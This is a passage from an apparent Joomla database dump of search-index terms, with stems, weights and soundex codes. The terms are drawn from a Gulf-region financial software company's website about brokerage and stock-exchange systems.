a','to build a',0,1,1.3333,'T143',1,'en'),(566,'to update','to update',0,1,1.3,'T130',1,'en'),(567,'to update and','to update and',0,1,1.4333,'T1353',1,'en'),(568,'update','updat',0,0,0.4,'U130',1,'en'),(569,'update and','updat and',0,1,1.3333,'U1353',1,'en'),(570,'update and maintain','updat and maintain',0,1,1.6333,'U1353535',1,'en'),(571,'visitors','visitor',0,0,0.5333,'V2362',1,'en'),(572,'visitors joomla','visitor joomla',0,1,1.5,'V236254',1,'en'),(573,'visitors joomla is','visitor joomla is',0,1,1.6,'V2362542',1,'en'),(574,'want','want',1,0,0.0333,'W530',5,'en'),(575,'want it','want it',0,1,1.2333,'W530',1,'en'),(576,'want it and','want it and',0,1,1.3667,'W5353',1,'en'),(577,'want it to','want it to',0,1,1.3333,'W530',1,'en'),(578,'way','wai',1,0,0.025,'W000',7,'en'),(579,'way you','wai you',0,1,1.2333,'W000',2,'en'),(580,'way you want','wai you want',0,1,1.4,'W530',1,'en'),(581,'website','websit',0,0,0.4667,'W123',2,'en'),(582,'website just','websit just',0,1,1.4,'W12323',1,'en'),(583,'website just the','websit just the',0,1,1.5333,'W12323',1,'en'),(584,'whether','whether',0,0,0.4667,'W360',6,'en'),(585,'whether you','whether you',0,1,1.3667,'W360',2,'en'),(586,'whether you are','whether you are',0,1,1.5,'W360',1,'en'),(587,'which','which',1,0,0.0417,'W200',8,'en'),(588,'which means','which means',0,1,1.3667,'W252',1,'en'),(589,'which means you','which means you',0,1,1.5,'W252',1,'en'),(590,'with','with',1,0,0.0333,'W300',22,'en'),(591,'with hundreds','with hundreds',0,1,1.4333,'W353632',1,'en'),(592,'with hundreds of','with hundreds of',0,1,1.5333,'W3536321',1,'en'),(593,'work','work',0,0,0.2667,'W620',8,'en'),(594,'work just','work just',0,1,1.3,'W623',1,'en'),(595,'work just the','work just the',0,1,1.4333,'W623',1,'en'),(596,'you','you',1,0,0.025,'Y000',19,'en'),(597,'you are','you are',0,1,1.2333,'Y600',3,'en'),(598,'you are building','you are building',0,1,1.5333,'Y614352',1,'en'),(599,'you can','you can',0,1,1.2333,'Y250',4,'en'),(600,'you can make','you can make',0,1,1.4,'Y252',1,'en'),(601,'you have','you have',0,1,1.2667,'Y100',5,'en'),(602,'you have a','you have a',0,1,1.3333,'Y100',2,'en'),(603,'you want','you want',0,1,1.2667,'Y530',3,'en'),(604,'you want it','you want it',0,1,1.3667,'Y530',1,'en'),(605,'your','your',1,0,0.0333,'Y600',10,'en'),(606,'your site','your site',0,1,1.3,'Y623',1,'en'),(607,'your site easy','your site easy',0,1,1.4667,'Y6232',1,'en'),(608,'yourself','yourself',0,0,0.5333,'Y6241',6,'en'),(609,'yourself or','yourself or',0,1,1.3667,'Y62416',2,'en'),(610,'yourself or a','yourself or a',0,1,1.4333,'Y62416',1,'en'),(1531,'a software','a software',0,1,1.3333,'A2136',2,'en'),(1555,'based','base',0,0,0.3333,'B230',6,'en'),(1558,'both','both',0,0,0.2667,'B300',6,'en'),(1564,'business','busi',0,0,0.5333,'B252',14,'en'),(1569,'clients','client',0,0,0.4667,'C4532',2,'en'),(1570,'clients based','client based',0,1,1.4333,'C4532123',1,'en'),(1614,'fit','fit',0,0,0.2,'F300',5,'en'),(1631,'in','in',1,0,0.0167,'I500',25,'en'),(1634,'industry','industri',0,0,0.5333,'I53236',2,'en'),(1648,'look','look',0,0,0.2667,'L200',10,'en'),(1654,'market','market',0,0,0.4,'M623',6,'en'),(1671,'of the','of the',0,1,1.2,'O130',19,'en'),(1673,'offer','offer',0,0,0.3333,'O160',3,'en'),(1676,'on','on',1,0,0.0167,'O500',23,'en'),(1682,'our','our',1,0,0.025,'O600',6,'en'),(1683,'our clients','our clients',0,1,1.3667,'O624532',1,'en'),(1695,'provided','provid',0,0,0.5333,'P613',3,'en'),(1698,'providing','provid',0,0,0.6,'P61352',5,'en'),(1716,'services','servic',0,0,0.5333,'S612',6,'en'),(1721,'software','softwar',0,0,0.5333,'S136',4,'en'),(1722,'software solutions','softwar solutions',0,1,1.6,'S13624352',1,'en'),(1726,'solutions','solut',0,0,0.6,'S4352',6,'en'),(1774,'to our','to our',0,1,1.2,'T600',3,'en'),(1775,'to our clients','to our clients',0,1,1.4667,'T624532',1,'en'),(1796,'we','we',0,0,0.1333,'W000',9,'en'),(1805,'we look','we look',0,1,1.2333,'W420',1,'en'),(1809,'well','well',0,0,0.2667,'W400',12,'en'),(2898,'oman','oman',0,0,0.2667,'O500',4,'en'),(3023,'100','100',0,0,0.3,'',2,'en'),(3024,'arab','arab',0,0,0.2667,'A610',1,'en'),(3025,'arab bank','arab bank',0,1,1.3,'A6152',1,'en'),(3026,'bank','bank',0,0,0.2667,'B520',3,'en'),(3027,'menu','menu',0,0,0.2667,'M000',2,'en'),(3028,'oab','oab',0,0,0.2,'O100',1,'en'),(3029,'offcanvas','offcanva',0,0,0.6,'O12512',1,'en'),(3030,'offcanvas menu','offcanva menu',0,1,1.4667,'O125125',1,'en'),(3031,'oman arab','oman arab',0,1,1.3,'O561',1,'en'),(3032,'oman arab bank','oman arab bank',0,1,1.4667,'O56152',1,'en'),(3033,'99','99',0,0,0.2,'',1,'en'),(3034,'customization','custom',0,0,0.8667,'C35235',1,'en'),(3035,'easy customization','easi customization',0,1,1.6,'E235235',1,'en'),(3036,'msm','msm',0,0,0.2,'M250',1,'en'),(3037,'muscat','muscat',0,0,0.4,'M230',2,'en'),(3038,'muscat security','muscat security',0,1,1.5,'M23263',1,'en'),(3039,'muscat security market','muscat security market',0,1,1.7333,'M232635623',1,'en'),(3040,'security','secur',0,0,0.5333,'S630',2,'en'),(3041,'security market','secur market',0,1,1.5,'S635623',1,'en'),(3042,'102','102',0,0,0.3,'',1,'en'),(3043,'fluid','fluid',0,0,0.3333,'F430',1,'en'),(3044,'fluid layout','fluid layout',0,1,1.4,'F4343',1,'en'),(3045,'layout','layout',0,0,0.4,'L300',1,'en'),(3046,'united','unit',0,0,0.4,'U530',6,'en'),(3047,'111','111',0,0,0.3,'',1,'en'),(3048,'business pages','busi pages',0,1,1.4667,'B25212',10,'en'),(3049,'dfm','dfm',0,0,0.2,'D150',1,'en'),(3050,'uae','uae',0,0,0.2,'U000',16,'en'),(3051,'98','98',0,0,0.2,'',1,'en'),(3052,'al','al',0,0,0.1333,'A400',3,'en'),(3053,'al ramz','al ramz',0,1,1.2333,'A4652',1,'en'),(3054,'lazy','lazi',0,0,0.2667,'L200',1,'en'),(3055,'lazy loader','lazi loader',0,1,1.3667,'L2436',1,'en'),(3056,'loader','loader',0,0,0.4,'L360',1,'en'),(3057,'ramz','ramz',0,0,0.2667,'R520',1,'en'),(3058,'95','95',0,0,0.2,'',1,'en'),(3059,'abu','abu',0,0,0.2,'A100',2,'en'),(3060,'abu dhabi','abu dhabi',0,1,1.3,'A131',2,'en'),(3061,'and css3','and css3',0,1,1.2667,'A532',1,'en'),(3062,'bank of','bank of',0,1,1.2333,'B521',1,'en'),(3063,'bank of abu','bank of abu',0,1,1.3667,'B521',1,'en'),(3064,'css3','css3',0,0,0.2667,'C000',1,'en'),(3065,'dhabi','dhabi',0,0,0.3333,'D100',2,'en'),(3066,'html5','html5',0,0,0.3333,'H354',2,'en'),(3067,'html5 and','html5 and',0,1,1.3,'H35453',1,'en'),(3068,'html5 and css3','html5 and css3',0,1,1.4667,'H354532',1,'en'),(3069,'national','nation',0,0,0.5333,'N354',4,'en'),(3070,'national bank','nation bank',0,1,1.4333,'N354152',1,'en'),(3071,'national bank of','nation bank of',0,1,1.5333,'N3541521',1,'en'),(3072,'of abu','of abu',0,1,1.2,'O100',1,'en'),(3073,'of abu dhabi','of abu dhabi',0,1,1.4,'O131',1,'en'),(3075,'client','client',0,0,0.4,'C453',2,'en'),(9204,'1343pt','1343pt',0,0,0.4,'P300',1,'en'),(9205,'1343pt padding-left','1343pt padding-left',0,1,1.6333,'P31352413',1,'en'),(9206,'1343pt padding-left 30px','1343pt padding-left 30px',0,1,1.8,'P3135241312',1,'en'),(9207,'15pt','15pt',0,0,0.2667,'P300',1,'en'),(9208,'15pt width','15pt width',0,1,1.3333,'P300',1,'en'),(9209,'15pt width 1343pt','15pt width 1343pt',0,1,1.5667,'P313',1,'en'),(9210,'1790','1790',0,0,0.4,'',1,'en'),(9211,'1790 height','1790 height',0,1,1.3667,'H230',1,'en'),(9212,'1790 height 20','1790 height 20',0,1,1.4667,'H230',1,'en'),(9213,'1999','1999',0,0,0.4,'',1,'en'),(9214,'1999 first','1999 first',0,1,1.3333,'F623',1,'en'),(9215,'1999 first information','1999 first information',0,1,1.7333,'F623516535',1,'en'),(9216,'20','20',0,0,0.2,'',5,'en'),(9217,'20 provide','20 provide',0,1,1.3333,'P613',1,'en'),(9218,'20 provide better','20 provide better',0,1,1.5667,'P613136',1,'en'),(9219,'30px','30px',0,0,0.2667,'P200',1,'en'),(9220,'30px width','30px width',0,1,1.3333,'P230',1,'en'),(9221,'30px width 1790','30px width 1790',0,1,1.5,'P230',1,'en'),(9222,'84','84',0,0,0.2,'',1,'en'),(9223,'a cornerstone','a cornerstone',0,1,1.4333,'A2656235',1,'en'),(9224,'a cornerstone for','a cornerstone for',0,1,1.5667,'A265623516',1,'en'),(9225,'a leader','a leader',0,1,1.2667,'A436',1,'en'),(9226,'a leader solution','a leader solution',0,1,1.5667,'A4362435',1,'en'),(9227,'a software solutions','a software solutions',0,1,1.6667,'A213624352',1,'en'),(9228,'about','about',1,0,0.0417,'A130',13,'en'),(9229,'about us','about us',0,1,1.2667,'A132',1,'en'),(9230,'abu dhabi nasdaq','abu dhabi nasdaq',0,1,1.5333,'A1315232',1,'en'),(9231,'accomplish','accomplish',0,0,0.6667,'A25142',1,'en'),(9232,'accomplish our','accomplish our',0,1,1.4667,'A251426',1,'en'),(9233,'accomplish our mission','accomplish our mission',0,1,1.7333,'A251426525',1,'en'),(9234,'achieve','achiev',0,0,0.4667,'A210',1,'en'),(9235,'achieve those','achiev those',0,1,1.4333,'A2132',1,'en'),(9236,'achieve those goals','achiev those goals',0,1,1.6333,'A213242',1,'en'),(9237,'added','ad',0,0,0.3333,'A300',1,'en'),(9238,'added value','ad value',0,1,1.3667,'A314',1,'en'),(9239,'added value we','ad value we',0,1,1.4667,'A314',1,'en'),(9240,'among','among',0,0,0.3333,'A520',5,'en'),(9241,'among others','among others',0,1,1.4,'A52362',1,'en'),(9242,'among others we','among others we',0,1,1.5,'A52362',1,'en'),(9243,'and damascus','and damascus',0,1,1.4,'A5352',1,'en'),(9244,'and damascus stock','and damascus stock',0,1,1.6,'A535232',1,'en'),(9245,'and data','and data',0,1,1.2667,'A530',1,'en'),(9246,'and data of','and data of',0,1,1.3667,'A531',1,'en'),(9247,'and fully','and fully',0,1,1.3,'A5314',1,'en'),(9248,'and fully taken','and fully taken',0,1,1.5,'A5314325',1,'en'),(9249,'and in','and in',0,1,1.2,'A535',4,'en'),(9250,'and in order','and in order',0,1,1.4,'A535636',1,'en'),(9251,'and internet','and internet',0,1,1.4,'A5353653',2,'en'),(9252,'and internet mobile','and internet mobile',0,1,1.6333,'A5353653514',1,'en'),(9253,'and jordan','and jordan',0,1,1.3333,'A532635',1,'en'),(9254,'and jordan partners','and jordan partners',0,1,1.6333,'A532635163562',1,'en'),(9255,'and khartoum','and khartoum',0,1,1.4,'A532635',1,'en'),(9256,'and khartoum stock','and khartoum stock',0,1,1.6,'A532635232',1,'en'),(9257,'and other','and other',0,1,1.3,'A536',2,'en'),(9258,'and other industry','and other industry',0,1,1.6,'A53653236',1,'en'),(9259,'and requirements','and requirements',0,1,1.5333,'A53626532',1,'en'),(9260,'and requirements without','and requirements without',0,1,1.8,'A536265323',1,'en'),(9261,'and software','and software',0,1,1.4,'A532136',1,'en'),(9262,'and software applications','and software applications',0,1,1.8333,'A532136142352',1,'en'),(9263,'and syria','and syria',0,1,1.3,'A5326',1,'en'),(9264,'and syria focused','and syria focused',0,1,1.5667,'A5326123',1,'en'),(9265,'any','ani',1,0,0.025,'A500',9,'en'),(9266,'any enterprise','ani enterprise',0,1,1.4667,'A536162',1,'en'),(9267,'any enterprise as','ani enterprise as',0,1,1.5667,'A536162',1,'en'),(9268,'applications','applic',0,0,0.8,'A142352',3,'en'),(9269,'applications mission','applic mission',0,1,1.6667,'A142352525',1,'en'),(9270,'applications that','applic that',0,1,1.5667,'A1423523',1,'en'),(9271,'applications that we','applic that we',0,1,1.6667,'A1423523',1,'en'),(9272,'arabia','arabia',0,0,0.4,'A610',1,'en'),(9273,'arabia qatar','arabia qatar',0,1,1.4,'A61236',1,'en'),(9274,'arabia qatar egypt','arabia qatar egypt',0,1,1.6,'A61236213',1,'en'),(9275,'art','art',0,0,0.2,'A630',1,'en'),(9276,'art technology','art technology',0,1,1.4667,'A632542',1,'en'),(9277,'art technology to','art technology to',0,1,1.5667,'A6325423',1,'en'),(9278,'as','as',1,0,0.0167,'A200',18,'en'),(9279,'as a','as a',0,1,1.1333,'A200',11,'en'),(9280,'as a cornerstone','as a cornerstone',0,1,1.5333,'A2656235',1,'en'),(9281,'as a leader','as a leader',0,1,1.3667,'A2436',1,'en'),(9282,'as consultant','as consultant',0,1,1.4333,'A2524353',1,'en'),(9283,'as consultant or','as consultant or',0,1,1.5333,'A25243536',1,'en'),(9284,'as dubai','as dubai',0,1,1.2667,'A231',1,'en'),(9285,'as dubai financial','as dubai financial',0,1,1.6,'A231524',1,'en'),(9286,'as part','as part',0,1,1.2333,'A2163',2,'en'),(9287,'as part of','as part of',0,1,1.3333,'A21631',2,'en'),(9288,'as the','as the',0,1,1.2,'A230',4,'en'),(9289,'as the future','as the future',0,1,1.4333,'A23136',1,'en'),(9290,'as well','as well',0,1,1.2333,'A240',4,'en'),(9291,'as well as','as well as',0,1,1.3333,'A242',3,'en'),(9292,'assets','asset',0,0,0.4,'A232',3,'en'),(9293,'assets so','asset so',0,1,1.3,'A232',1,'en'),(9294,'assets so it','asset so it',0,1,1.4,'A2323',1,'en'),(9295,'at information','at information',0,1,1.4667,'A3516535',1,'en'),(9296,'at information and','at information and',0,1,1.6,'A35165353',1,'en'),(9297,'based in','base in',0,1,1.2667,'B235',1,'en'),(9298,'based in the','base in the',0,1,1.4,'B2353',1,'en'),(9299,'be','be',1,0,0.0167,'B000',16,'en'),(9300,'be preserved','be preserved',0,1,1.4,'B62613',1,'en'),(9301,'be preserved maintained','be preserved maintained',0,1,1.7667,'B626135353',1,'en'),(9302,'be the','be the',0,1,1.2,'B300',1,'en'),(9303,'be the regional','be the regional',0,1,1.5,'B36254',1,'en'),(9304,'believe','believ',0,0,0.4667,'B410',2,'en'),(9305,'believe we','believ we',0,1,1.3333,'B410',1,'en'),(9306,'believe we will','believ we will',0,1,1.5,'B414',1,'en'),(9307,'better','better',0,0,0.4,'B360',3,'en'),(9308,'better services','better services',0,1,1.5,'B362612',1,'en'),(9309,'better services to','better services to',0,1,1.6,'B3626123',1,'en'),(9310,'both hardware','both hardware',0,1,1.4333,'B3636',1,'en'),(9311,'both hardware and','both hardware and',0,1,1.5667,'B363653',1,'en'),(9312,'breadth','breadth',0,0,0.4667,'B630',1,'en'),(9313,'breadth of','breadth of',0,1,1.3333,'B631',1,'en'),(9314,'breadth of functionality','breadth of functionality',0,1,1.8,'B631523543',1,'en'),(9315,'bring','bring',0,0,0.3333,'B652',2,'en'),(9316,'bring the','bring the',0,1,1.3,'B6523',1,'en'),(9317,'bring the state','bring the state',0,1,1.5,'B652323',1,'en'),(9318,'brokerage','brokerag',0,0,0.6,'B6262',5,'en'),(9319,'brokerage financial','brokerag financial',0,1,1.6333,'B62621524',1,'en'),(9320,'brokerage financial investment','brokerag financial investment',0,1,2,'B62621524512353',1,'en'),(9321,'brokerage fund','brokerag fund',0,1,1.4667,'B6262153',1,'en'),(9322,'brokerage fund management','brokerag fund management',0,1,1.8333,'B62621535253',1,'en'),(9323,'brokerage management','brokerag management',0,1,1.6667,'B62625253',3,'en'),(9324,'brokerage management portfolio','brokerag management portfolio',0,1,2,'B6262525316314',1,'en'),(9325,'by','by',1,0,0.0167,'B000',18,'en'),(9326,'by fit','by fit',0,1,1.2,'B300',1,'en'),(9327,'by fit offer','by fit offer',0,1,1.4,'B316',1,'en'),(9328,'by providing','by providing',0,1,1.4,'B61352',1,'en'),(9329,'by providing investment','by providing investment',0,1,1.7667,'B61352512353',1,'en'),(9330,'care','care',0,0,0.2667,'C600',3,'en'),(9331,'care of','care of',0,1,1.2333,'C610',1,'en'),(9332,'care of the','care of the',0,1,1.3667,'C613',1,'en'),(9333,'care off','care off',0,1,1.2667,'C610',1,'en'),(9334,'care off by','care off by',0,1,1.3667,'C610',1,'en'),(9335,'centre','centr',0,0,0.4,'C536',1,'en'),(9336,'centre fit','centr fit',0,1,1.3333,'C53613',1,'en'),(9337,'centre fit is','centr fit is',0,1,1.4333,'C536132',1,'en'),(9338,'choice','choic',0,0,0.4,'C000',5,'en'),(9339,'choice of','choic of',0,1,1.3,'C100',2,'en'),(9340,'choice of technology','choic of technology',0,1,1.6667,'C132542',1,'en'),(9341,'clients based in','client based in',0,1,1.5333,'C45321235',1,'en'),(9342,'clients having','client having',0,1,1.4667,'C4532152',1,'en'),(9343,'clients having this','client having this',0,1,1.6333,'C453215232',1,'en'),(9344,'clients this','client this',0,1,1.4,'C453232',1,'en'),(9345,'clients this statement','client this statement',0,1,1.7333,'C453232353',1,'en'),(9346,'closely','close',0,0,0.4667,'C424',1,'en'),(9347,'closely with','close with',0,1,1.4,'C4243',1,'en'),(9348,'closely with the','close with the',0,1,1.5333,'C4243',1,'en'),(9349,'consultant','consult',0,0,0.6667,'C524353',1,'en'),(9350,'consultant or','consult or',0,1,1.4333,'C5243536',1,'en'),(9351,'consultant or solution','consult or solution',0,1,1.7333,'C52435362435',1,'en'),(9352,'core','core',0,0,0.2667,'C600',4,'en'),(9353,'core solutions','core solutions',0,1,1.4667,'C624352',1,'en'),(9354,'core solutions provided','core solutions provided',0,1,1.7667,'C6243521613',1,'en'),(9355,'cornerstone','cornerston',0,0,0.7333,'C656235',1,'en'),(9356,'cornerstone for','cornerston for',0,1,1.5,'C65623516',1,'en'),(9357,'cornerstone for maximizing','cornerston for maximizing',0,1,1.8667,'C65623516525252',1,'en'),(9358,'current','current',0,0,0.4667,'C653',4,'en'),(9359,'current needs','current needs',0,1,1.4333,'C653532',1,'en'),(9360,'current needs as','current needs as',0,1,1.5333,'C653532',1,'en'),(9361,'damascus','damascu',0,0,0.5333,'D520',1,'en'),(9362,'damascus stock','damascu stock',0,1,1.4667,'D5232',1,'en'),(9363,'damascus stock exchanges','damascu stock exchanges',0,1,1.8,'D523252',1,'en'),(9364,'data','data',0,0,0.2667,'D000',6,'en'),(9365,'data of','data of',0,1,1.2333,'D100',1,'en'),(9366,'data of any','data of any',0,1,1.3667,'D150',1,'en'),(9367,'deliver','deliv',0,0,0.4667,'D416',1,'en'),(9368,'deliver to','deliv to',0,1,1.3333,'D4163',1,'en'),(9369,'deliver to our','deliv to our',0,1,1.4667,'D41636',1,'en'),(9370,'delivering','deliv',0,0,0.6667,'D41652',1,'en'),(9371,'delivering brokerage','deliv brokerage',0,1,1.6667,'D4165216262',1,'en'),(9372,'delivering brokerage financial','deliv brokerage financial',0,1,2,'D41652162621524',1,'en'),(9373,'developed','develop',0,0,0.6,'D1413',3,'en'),(9374,'developed take','develop take',0,1,1.4667,'D14132',1,'en'),(9375,'developed take care','develop take care',0,1,1.6333,'D141326',1,'en'),(9376,'dhabi nasdaq','dhabi nasdaq',0,1,1.4,'D15232',1,'en'),(9377,'dhabi nasdaq dubai','dhabi nasdaq dubai',0,1,1.6,'D1523231',1,'en'),(9378,'dissemination','dissemin',0,0,0.8667,'D2535',2,'en'),(9379,'dissemination and','dissemin and',0,1,1.5667,'D25353',1,'en'),(9380,'dissemination and other','dissemin and other',0,1,1.7667,'D253536',1,'en'),(9381,'dissemination website','dissemin website',0,1,1.7,'D2535123',1,'en'),(9382,'dissemination website muscat','dissemin website muscat',0,1,1.9333,'D2535123523',1,'en'),(9383,'dubai','dubai',0,0,0.3333,'D100',1,'en'),(9384,'dubai abu','dubai abu',0,1,1.3,'D100',1,'en'),(9385,'dubai abu dhabi','dubai abu dhabi',0,1,1.5,'D131',1,'en'),(9386,'dubai financial','dubai financial',0,1,1.5,'D1524',1,'en'),(9387,'dubai financial market','dubai financial market',0,1,1.7333,'D15245623',1,'en'),(9388,'dubai qatar','dubai qatar',0,1,1.3667,'D1236',1,'en'),(9389,'dubai qatar jordan','dubai qatar jordan',0,1,1.6,'D12362635',1,'en'),(9390,'efficiency','effici',0,0,0.6667,'E1252',1,'en'),(9391,'efficiency of','effici of',0,1,1.4333,'E12521',1,'en'),(9392,'efficiency of our','effici of our',0,1,1.5667,'E125216',1,'en'),(9393,'egypt','egypt',0,0,0.3333,'E213',1,'en'),(9394,'egypt and','egypt and',0,1,1.3,'E21353',1,'en'),(9395,'egypt and syria','egypt and syria',0,1,1.5,'E2135326',1,'en'),(9396,'either','either',0,0,0.4,'E360',2,'en'),(9397,'either as','either as',0,1,1.3,'E362',1,'en'),(9398,'either as consultant','either as consultant',0,1,1.6667,'E362524353',1,'en'),(9399,'encompasses','encompass',0,0,0.7333,'E52512',1,'en'),(9400,'encompasses the','encompass the',0,1,1.5,'E525123',1,'en'),(9401,'encompasses the following','encompass the following',0,1,1.8333,'E5251231452',1,'en'),(9402,'engine','engin',0,0,0.4,'E525',2,'en'),(9403,'engine for','engin for',0,1,1.3333,'E52516',1,'en'),(9404,'engine for muscat','engin for muscat',0,1,1.5667,'E52516523',1,'en'),(9405,'engine vision','engin vision',0,1,1.4333,'E525125',1,'en'),(9406,'engine vision be','engin vision be',0,1,1.5333,'E5251251',1,'en'),(9407,'enhance','enhanc',0,0,0.4667,'E520',1,'en'),(9408,'enhance the','enhanc the',0,1,1.3667,'E523',1,'en'),(9409,'enhance the operational','enhanc the operational',0,1,1.7667,'E52316354',1,'en'),(9410,'enterprise','enterpris',0,0,0.6667,'E536162',1,'en'),(9411,'enterprise as','enterpris as',0,1,1.4333,'E536162',1,'en'),(9412,'enterprise as part','enterpris as part',0,1,1.6,'E536162163',1,'en'),(9413,'enterprise we','enterpris we',0,1,1.4333,'E536162',1,'en'),(9414,'enterprise we believe','enterpris we believe',0,1,1.7,'E536162141',1,'en'),(9415,'established','establish',0,0,0.7333,'E231423',5,'en'),(9416,'established in','establish in',0,1,1.4667,'E2314235',2,'en'),(9417,'established in 1999','establish in 1999',0,1,1.6333,'E2314235',1,'en'),(9418,'established the','establish the',0,1,1.5,'E231423',1,'en'),(9419,'established the first','establish the first',0,1,1.7,'E2314231623',1,'en'),(9420,'exchange','exchang',0,0,0.5333,'E252',1,'en'),(9421,'exchange trading','exchang trading',0,1,1.5333,'E25236352',1,'en'),(9422,'exchange trading engine','exchang trading engine',0,1,1.7667,'E25236352525',1,'en'),(9423,'exchanges','exchang',0,0,0.6,'E252',1,'en'),(9424,'exchanges either','exchang either',0,1,1.5333,'E25236',1,'en'),(9425,'exchanges either as','exchang either as',0,1,1.6333,'E252362',1,'en'),(9426,'exchanges the','exchang the',0,1,1.4333,'E2523',1,'en'),(9427,'exchanges the core','exchang the core',0,1,1.6,'E252326',1,'en'),(9428,'expansions','expans',0,0,0.6667,'E215252',1,'en'),(9429,'expansions and','expans and',0,1,1.4667,'E21525253',1,'en'),(9430,'expansions and requirements','expans and requirements',0,1,1.9,'E21525253626532',1,'en'),(9431,'financial','financi',0,0,0.6,'F524',4,'en'),(9432,'financial investment','financi investment',0,1,1.6667,'F524512353',1,'en'),(9433,'financial investment applications','financi investment applications',0,1,2,'F524512353142352',1,'en'),(9434,'financial market','financi market',0,1,1.5333,'F5245623',1,'en'),(9435,'financial market portal','financi market portal',0,1,1.7667,'F52456231634',1,'en'),(9436,'financial services','financi services',0,1,1.6,'F5242612',2,'en'),(9437,'financial services products','financi services products',0,1,1.9,'F5242612163232',1,'en'),(9438,'first','first',0,0,0.3333,'F623',7,'en'),(9439,'first information','first information',0,1,1.5667,'F623516535',1,'en'),(9440,'first information technology','first information technology',0,1,1.9333,'F62351653532542',1,'en'),(9441,'first provider','first provider',0,1,1.4667,'F62316136',1,'en'),(9442,'first provider hits','first provider hits',0,1,1.6333,'F6231613632',1,'en'),(9443,'fit as','fit as',0,1,1.2,'F320',1,'en'),(9444,'fit as a','fit as a',0,1,1.2667,'F320',1,'en'),(9445,'fit is','fit is',0,1,1.2,'F320',2,'en'),(9446,'fit is a','fit is a',0,1,1.2667,'F320',1,'en'),(9447,'fit is working','fit is working',0,1,1.4667,'F326252',1,'en'),(9448,'fit offer','fit offer',0,1,1.3,'F316',1,'en'),(9449,'fit offer the','fit offer the',0,1,1.4333,'F3163',1,'en'),(9450,'fit to','fit to',0,1,1.2,'F300',1,'en'),(9451,'fit to achieve','fit to achieve',0,1,1.4667,'F321',1,'en'),(9452,'fit was','fit was',0,1,1.2333,'F320',1,'en'),(9453,'fit was the','fit was the',0,1,1.3667,'F323',1,'en'),(9454,'fix','fix',0,0,0.2,'F200',2,'en'),(9455,'fix protocol','fix protocol',0,1,1.4,'F216324',1,'en'),(9456,'fix protocol stp','fix protocol stp',0,1,1.5333,'F216324231',1,'en'),(9457,'focused','focus',0,0,0.4667,'F230',2,'en'),(9458,'focused on','focus on',0,1,1.3333,'F235',2,'en'),(9459,'focused on the','focus on the',0,1,1.4667,'F2353',1,'en'),(9460,'following','follow',0,0,0.6,'F452',7,'en'),(9461,'following brokerage','follow brokerage',0,1,1.6333,'F45216262',1,'en'),(9462,'following brokerage management','follow brokerage management',0,1,2,'F452162625253',1,'en'),(9463,'for maximizing','for maximizing',0,1,1.4667,'F6525252',1,'en'),(9464,'for maximizing the','for maximizing the',0,1,1.6,'F65252523',1,'en'),(9465,'for muscat','for muscat',0,1,1.3333,'F6523',1,'en'),(9466,'for muscat dubai','for muscat dubai',0,1,1.5333,'F65231',1,'en'),(9467,'fully','fulli',0,0,0.3333,'F400',3,'en'),(9468,'fully taken','fulli taken',0,1,1.3667,'F4325',1,'en'),(9469,'fully taken care','fulli taken care',0,1,1.5333,'F432526',1,'en'),(9470,'functionality','function',0,0,0.8667,'F523543',1,'en'),(9471,'functionality encompasses','function encompasses',0,1,1.8333,'F52354352512',1,'en'),(9472,'functionality encompasses the','function encompasses the',0,1,1.9667,'F523543525123',1,'en'),(9473,'functionality in','function in',0,1,1.5333,'F5235435',1,'en'),(9474,'functionality in the','function in the',0,1,1.6667,'F52354353',1,'en'),(9475,'fund','fund',0,0,0.2667,'F530',2,'en'),(9476,'fund management','fund management',0,1,1.5,'F535253',2,'en'),(9477,'fund management portfolio','fund management portfolio',0,1,1.8333,'F53525316314',1,'en'),(9478,'fund management research','fund management research',0,1,1.8,'F5352536262',1,'en'),(9479,'future','futur',0,0,0.4,'F360',2,'en'),(9480,'future expansions','futur expansions',0,1,1.5667,'F36215252',1,'en'),(9481,'future expansions and','futur expansions and',0,1,1.7,'F3621525253',1,'en'),(9482,'gcc','gcc',0,0,0.2,'G000',1,'en'),(9483,'gcc fit','gcc fit',0,1,1.2333,'G130',1,'en'),(9484,'gcc fit was','gcc fit was',0,1,1.3667,'G132',1,'en'),(9485,'gcc with','gcc with',0,1,1.2667,'G300',1,'en'),(9486,'gcc with offices','gcc with offices',0,1,1.5333,'G312',1,'en'),(9487,'goals','goal',0,0,0.3333,'G420',1,'en'),(9488,'goals among','goal among',0,1,1.3667,'G4252',1,'en'),(9489,'goals among others','goal among others',0,1,1.6,'G4252362',1,'en'),(9490,'hardware','hardwar',0,0,0.5333,'H636',2,'en'),(9491,'hardware and','hardwar and',0,1,1.4,'H63653',1,'en'),(9492,'hardware and software','hardwar and software',0,1,1.7,'H636532136',1,'en'),(9493,'has','ha',0,0,0.2,'H200',14,'en'),(9494,'has the','ha the',0,1,1.2333,'H230',1,'en'),(9495,'has the largest','ha the largest',0,1,1.5,'H234623',1,'en'),(9496,'has to','ha to',0,1,1.2,'H230',2,'en'),(9497,'has to be','ha to be',0,1,1.3,'H231',2,'en'),(9498,'having','have',0,0,0.4,'H152',4,'en'),(9499,'having this','have this',0,1,1.3667,'H15232',1,'en'),(9500,'having this in','have this in',0,1,1.4667,'H152325',1,'en'),(9501,'height','height',0,0,0.4,'H230',1,'en'),(9502,'height 20','height 20',0,1,1.3,'H230',1,'en'),(9503,'height 20 provide','height 20 provide',0,1,1.5667,'H231613',1,'en'),(9504,'hits','hit',0,0,0.2667,'H320',2,'en'),(9505,'hits the','hit the',0,1,1.2667,'H323',1,'en'),(9506,'hits the trading','hit the trading',0,1,1.5333,'H3236352',1,'en'),(9507,'in 1999','in 1999',0,1,1.2333,'I500',1,'en'),(9508,'in 1999 first','in 1999 first',0,1,1.4333,'I51623',1,'en'),(9509,'in both','in both',0,1,1.2333,'I513',1,'en'),(9510,'in both hardware','in both hardware',0,1,1.5333,'I513636',1,'en'),(9511,'in delivering','in delivering',0,1,1.4333,'I5341652',1,'en'),(9512,'in delivering brokerage','in delivering brokerage',0,1,1.7667,'I534165216262',1,'en'),(9513,'in mind','in mind',0,1,1.2333,'I530',1,'en'),(9514,'in mind and','in mind and',0,1,1.3667,'I5353',1,'en'),(9515,'in oman','in oman',0,1,1.2333,'I500',1,'en'),(9516,'in oman uae','in oman uae',0,1,1.3667,'I500',1,'en'),(9517,'in order','in order',0,1,1.2667,'I5636',2,'en'),(9518,'in order to','in order to',0,1,1.3667,'I56363',2,'en'),(9519,'in saudi','in saudi',0,1,1.2667,'I523',1,'en'),(9520,'in saudi arabia','in saudi arabia',0,1,1.5,'I52361',1,'en'),(9521,'in the','in the',0,1,1.2,'I530',19,'en'),(9522,'in the gcc','in the 